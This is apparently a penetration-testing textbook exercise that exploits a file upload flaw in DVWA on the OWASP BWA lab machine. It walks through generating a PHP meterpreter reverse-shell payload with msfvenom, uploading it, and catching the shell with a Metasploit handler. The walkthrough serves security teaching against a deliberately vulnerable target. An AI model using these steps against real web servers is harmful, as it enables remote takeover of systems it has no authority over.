Exploiting file upload vulnerabilities

In this exercise, we are going to use our OWASP BWA virtual machine to demonstrate a file upload vulnerability. Let's get started:

  1. First, create a payload on your Kali Linux (attacker) machine using msfvenom; it will later be uploaded to the target server. Use the following syntax to create a PHP-based payload that establishes a reverse connection back to Kali:
msfvenom -p php/meterpreter/reverse_tcp lhost=<IP address of Kali Linux> lport=4444 -f raw
  2. Copy the generated code exactly as msfvenom prints it (the first line carries the <?php tag the server needs in order to execute the file), open a text editor, and save it as img.php:

  3. Using your web browser within Kali Linux, enter the IP address of OWASP BWA in the address bar and hit Enter.
  4. On the main page, click on Damn Vulnerable Web Application:

  5. The DVWA login portal will appear. Log in with admin as the Username and admin as the Password:

  6. Once logged in, you'll see a menu on the left-hand side. Click on Upload to open the Vulnerability: File Upload page:

  7. Click on Browse..., select the img.php file, and then click Upload on the page.
  8. Once the file has been uploaded, you will receive a message displaying the directory where the file is stored on the server:

  9. Copy the file location, that is, hackable/uploads/img.php, and append it to the DVWA URL so that requesting it executes the payload (img.php). The following is the expected URL (note that there is no space in the path):
192.168.56.101/DVWA/hackable/uploads/img.php

Before you hit Enter, make sure the Metasploit handler from the next two steps is already listening: the PHP payload makes a single connection attempt back to LHOST when it runs, and if nothing is listening that attempt is simply lost and the file has to be requested again. Hit Enter to execute the payload.

  10. On Kali Linux, load Metasploit using the following commands:
service postgresql start
msfconsole
  11. Enable the exploit/multi/handler module in Metasploit, set the payload to php/meterpreter/reverse_tcp (the same payload msfvenom generated), set LHOST and LPORT to the values used when creating img.php, and execute the exploit using the following commands:

Please be sure to check the IP address of the Kali Linux machine (for example with ip addr) and adjust the LHOST parameter accordingly; the value must be an address the OWASP BWA machine can reach.

  12. Having executed the img.php payload on the server with the multi/handler listening in Metasploit, we receive a reverse shell on our attacker machine, as shown in the following screenshot:

Using the meterpreter shell, you are now able to perform further actions on the compromised system, which runs with the privileges of the web server process.

In the following section, we will demonstrate how to exploit code execution vulnerabilities.
